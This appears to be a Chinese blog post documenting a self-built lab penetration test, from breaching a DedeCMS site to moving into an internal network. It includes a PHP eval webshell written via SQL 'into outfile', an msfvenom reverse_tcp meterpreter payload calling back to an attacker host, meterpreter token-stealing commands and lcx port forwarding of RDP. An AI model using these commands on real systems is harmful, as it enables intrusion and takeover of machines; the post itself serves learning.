外网打点内网渗透

最新推荐文章于 2025-05-16 11:57:56 发布
最新推荐文章于 2025-05-16 11:57:56 发布
阅读量870 收藏 7
点赞数 20
CC 4.0 BY-SA版权
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/eidbsidbp/article/details/146485461

逻辑搭建

一.环境部署及搭建

一.搭建Dedecms管理系统

img

img

img

二.搭建内网测试环境

1.将测试环境部署在win2003中,并且我自己搭建了一个可以访问外网的网卡还有一个内网的网卡
2.将win2003克隆主机与win2003搭建在一个LAN区段的内网中,并且克隆的主机不能访问外网
搭建过程如下图

这是克隆主机的内网网卡,并使用桥接

这是win2003的内网网卡搭建

二.渗透测试获取webshell

#解释说明:
1.拿到一个网站先进行信息收集,拿到服务器的操作系统以及中间件版本及网站代码,本过程完全进行黑盒测试
2.通过拿到的网站信息如果是登录页面,先进行弱密码爆破。通过十大漏洞拿自己最擅长的方法尽可能的绕过防火墙拿去对方服务器的webshell
3.当拿到对方服务器可以使用菜刀或者冰蝎、御剑上传木马拿去webshell
4.通过webshell配合kali进行系统提权为管理员用户
5.当控制一台服务器主机就可以尝试进行内网横向渗透

一.信息收集

web漏洞扫描工具:appscan、awvs(Acunetix)、Netsparker.
​
系统漏洞扫描工具:nessus
​
信息收集:
​
域名:fofa、谷歌、百度、零零信安等搜索引擎、DNS历史记录、DNS备案号查询、https证书
​
敏感信息:谷歌搜索,社工库检索、威胁情报、天眼查、零零信安、7kb、破壳、dirsearch
​
IP地址:有CDN通过fofa标签找到真实ip、文件的hash值、网站证书、dns历史记录
​
网站指纹:wappalyzer插件、御剑web指纹识别、在线平台
​
端口:nmap、masscan、fscan、goby
​
目录扫描:7kb、破壳、御剑
​
旁站信息:fofa、masscan、k8、goby、fscan

一.AWVS扫描

通过扫描发现此站点是通过php所写的,并且中间件是阿帕奇

二.破壳扫描

三.facan

二.外网打点

#如何通过一个网站拿去webshell:

文件上传漏洞,后台编辑模板,sql 注入写文件,命令执行,代码执行, 一些已经爆
出的 cms 漏洞,比如 dedecms 后台可以直接建立脚本文件,wordpress 上传插件包含脚本
文件 zip 压缩包等 
​

一.登录进后台页面探测文件上传点

发现文件式管理器存在文件上传

二.上传php一句话

经过渗透后查看服务器发现文件上传成功

访问test.php
使用sql注入进行上传
Select '<?php eval($_POST[chopper]);?>' into outfile 'c:/phpstudy/www/eval.php';

使用webshell生成工具

三.使用菜刀连接

连接成功菜刀

中国蚁剑

哥斯拉

四.使用MSF提权

通过MSF生成一个木马文件通过菜刀上传到目标服务器
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.21.21 lport=4444 -f exe -o /tmp/hack.exe
​

五.菜刀切换进入终端目录

六.开启监听

七.使用getsystem进行提权

如上返回则说明Meterpreter会话自动提权成功。
这个时候,如果我们此目标机属于某个域环境内,并且有域管理员运行的进程,我们就可以从一个指定的进程PID中窃取一个域管理员组令牌,做一些有意思的事(如:添加一个域账户,并把域账户添加到域管理员组中)。
在Meterpreter会话执行ps命令查看目标机当前进程:
假设此处看到了一个进程,运行账户是域管理员,我们可以再第一栏找到对应的进程PID,(实际我们这里找个任意的SYSTEM账户运行的进程)
​
meterpreter > use incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token "NT AUTHORITY\SYSTEM"
meterpreter > ps    #查看目标机当前进程
meterpreter > steal_token PID  
meterpreter > migrate PID  

八.使用ps命令查看进程

九.使用steal_token_4080窃取该用户的进程令牌

十.直接进入终端

三.内网横向渗透

横向渗透的方法很多,这里我用最简单的方式进行获取内网主机远程连接
一.将LCK上传到菜刀

#重点:
        Webshell上执行:lcx.exe -slave 192.168.21.90 2222 127.0.0.1 3389 (将本机3389端口流量转发到公网ip的2222端口上去)
​
        自己的电脑里面执行:lcx.exe -listen 2222 4444 (监听本地的2222端口将流量转发到4444 )

二.上传3389到对方服务器

三.通过本机自带的远程连接工具连接内网

成功连接到内网

补充:

如果是红队可以用CS配合MSF进行内网渗透

主要学习思路过程

内网渗透-实战|手把手教你如何进行内网渗透
lza20001103的博客
08-18 2065
实战|手把手教你如何进行内网渗透 x00 Preface 内网渗透主要是基于前期外围打点getshell的webserver,通过收集webserver上的信息,然后对其他内网主机进行口令上的攻击,当然也有一些基于漏洞的攻击。 内网相关概念这里不再进行介绍,大家可以自行百度,诸如什么是域、域与工作组的区别、什么是DC、什么是AD等。当然,概念是生涩难懂的,结合实际环境会有助于理解。某内网靶场的详细教程:Vulnstack(一) 内网渗透过程中经常会涉及到内网穿透,如何理解内网穿透以及端口转发、端口映射等相关
内网渗透--对不出网目标的打法
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
08-03 1803
配置网络 在VM虚拟机中按照下边的网络拓扑进行配置网络。网络拓扑图如下: win7具有双网卡,其中外网ip是192.168.8.133,内网网段是52。三台机器彼此互通,但是win server 2008和win2003不通外网。用我mac作为攻击机,来对这个靶场环境进行渗透测试。 外网打点 在win7这台靶机上,使用PHPStudy让网站可以运行起来。在攻击机上,访问http://192.168.8.133可以看到是一个phpStudy 探针。对这网站进行渗透,因为本文主要写在内网渗透过程..
外网内网渗透过程
weixin_30507481的博客
06-09 2544
【实验环境】仅供学习参考 信息收集 登陆目标网站并收集信息 通过查看页面源码,发现cms版本信息为:DotNetCMS 2.0,通过上网查询可以找到该cms存在的漏洞,并进行复现 登录绕过漏洞 网站后台地址:/manage/Index.aspx 1)将代码写入exp.py文件中运行,即可得到cookie 代码如下: #coding:utf-8import argp...
前路漫漫,写给初级网安工程师的一份指南!
kjuhfkicf154的博客
05-27 305
2023网安入门超全指南
渗透实战 | 从外网直接打到内网全过程
kjuhfkicf154的博客
05-16 820
网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。
渗透测试实战 - 外网渗透内网穿透(超详细)
wangluoanquan111的博客
03-18 2243
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
工控攻防演示-从外网内网设备的入侵
曲终人散
08-06 2968
· 一、 概述 1. 实验目的 通过工控靶场学习web渗透内网渗透、工控安全相关知识技能。 2. 靶场信息 本实验通过vmware 搭建了靶场的外网内网环境,在内网环境中,可以连接到真实的PLC进行漏洞利用。 靶场网络拓扑如下: 该网络环境中,有两台攻击机处于模拟外网中,分别是一台 windows7 主机和 kali 主机,通过这两台主机进行漏洞利用,获取内网访问权限,进一步获取西门子PLC的控制权,从而控制城市沙盘。 二、 演示过程 1. 资产发现 登录 kali 攻击机,输入 ifconfig 查
网络安全渗透实战:从外网打点到三层内网渗透及域控权限获取全流程解析
最新发布
07-05
内容概要:本文档详细介绍了从外网打点到三层内网渗透的全过程,涵盖环境搭建、信息收集、SQL注入、编写脚本进行漏洞利用、获取WebShell内网渗透、域渗透等多个方面。首先通过VPS映射将内部网络暴露于公网,利用...
标价秒,超详细的网络安全学习笔记,共35万字,外网打点内网横向,隧道维持及HVV、渗透测试笔记等 kali使用方法、分析思路
05-07
涵盖外网打点全流程,从信息收集到漏洞利用,手把手教你突破防线!内网横向渗透策略大公开,轻松拿捏权限转移~隧道维持技巧更是保命秘籍,HVV攻防、渗透测试核心要点全梳理! kali工具使用教程从入门到精通,渗透...
外网访问内网Tomcat【无公网IP】
深耕远程领域 欢迎探讨
07-21 186
本地搭建了一个Tomcat服务端,只能在局域网内访问,想要在外网上访问到本地的Tomcat,要如何实现呢?只需要做简单的内网穿透,将内网端口映射到公网上,会生成相应的公网地址,在外网环境下,访问该公网地址就可以访问到内网Tomcat项目。不需要公网IP,也不需要进入到路由器设置,在本地安装个内网穿透工具就可以。下面推荐一款内网穿透工具,免费or付费使用,均支持http/https/tcp协议,不限制流量,可以根据实际需求选择:免费套餐,有4条隧道可以用,1M带宽,随机公网地址,每24小时会变化。
网络攻击之内外网
河北正定欢迎您-少占鱼
10-23 1594
网络攻击是近来常发生的问题,可以分为遭受外网攻击及内网攻击。以下分别说明: 1、外部来的DoS攻击会造成网络掉线,判别方法是从路由器的系统日志文件中可以看出,Qno侠诺的路由器会显示遭受攻击,而且路由器持续在工作。其它品牌的路由器,有些也有相关的功能,用户可以查看使用手册。DoS病毒攻击,如SYN攻击,因为发出大量数据包导致系统资源占用过多,使路由器损耗效能造成网络壅塞,达到瘫痪网吧网络对于广域网
使用浏览器作为代理从公网攻击内网
neal1991的专栏
04-15 2021
介绍在Forcepoint,我们不断寻求改善我们产品所提供的防护。为此,我们经常研究不寻常或潜在新颖的攻击技术。最近的一个研究课题是从公网发起的针对localhost...
web外网打点常规渗透思路
qq_38675102的博客
12-31 1304
web外网打点思路整理
【2024HW】|3-红队 | 外网快速打点方法&技巧总结
2401_84434570的博客
04-25 2388
做过红队的小伙伴,对打点一定不陌生,这是一项基本技能。所谓打点,就是拿到一台机器的shell。打点的一般目的在于利用这台机器,做一个跳板,然后进入内网。通常给予充分时间的情况下,打点不是一件很难的事情,因为系统总会有漏洞,就算系统没有漏 洞,人也有漏洞,也可以进行钓鱼,甚至还可以近源,可以花钱买内鬼,一切都只是打点的时间和价格成本与打到点进内网的收益的核算问题,本质就是一道数学题。但是以在公司干活的普通员工视角出发,一般项目时间很紧,同时外部资源少,基本能用的东西就是自己的技术。
内网渗透初探 | 小白简单学习内网渗透
m0_74942241的博客
06-19 778
以上便是我学习的简单地从外网获取shell,经过提权或不提权直接进行内网渗透的一个简单过程,其中涉及一些概念问题没有说的很明白,希望表哥们提点提点。以上仅为个人学习过程,可能知识点过于简单,望理解。
渗透/hvv--如何做好外围打点工作?
CSDN_3446的博客
08-25 563
首先,我们要明确一次完整的渗透测试的流程。分别是:明确目标-信息收集-漏洞探测-漏洞验证-信息分析-获取所需-信息整理-形成报告八个步骤,而信息打点的目的就是拿到一台机器的shell,然后以这台机器为跳板进入内网。主要的测试流程:信息收集--获取脆弱资产-漏洞利用-getshell。
最新最全的WEBSHELL提权方法【3】
weixin_34390996的博客
08-14 162
winNT/2000提升权限  WindowsNT/2000通用的提升方法  ***者在获得系统一定的访问权限后通常要把自 己的权限提升到管理员组,这样***者就控制了该计算机系统。这主要有以下几种方法:1.获得管理员密码,下次就可以用该密码进入系统;2.先新建一个 用户,然后把这个普通添加到管理员组,或者干脆直接把一个不起眼的用户如guest添加到管理员组...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Thor Superman

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值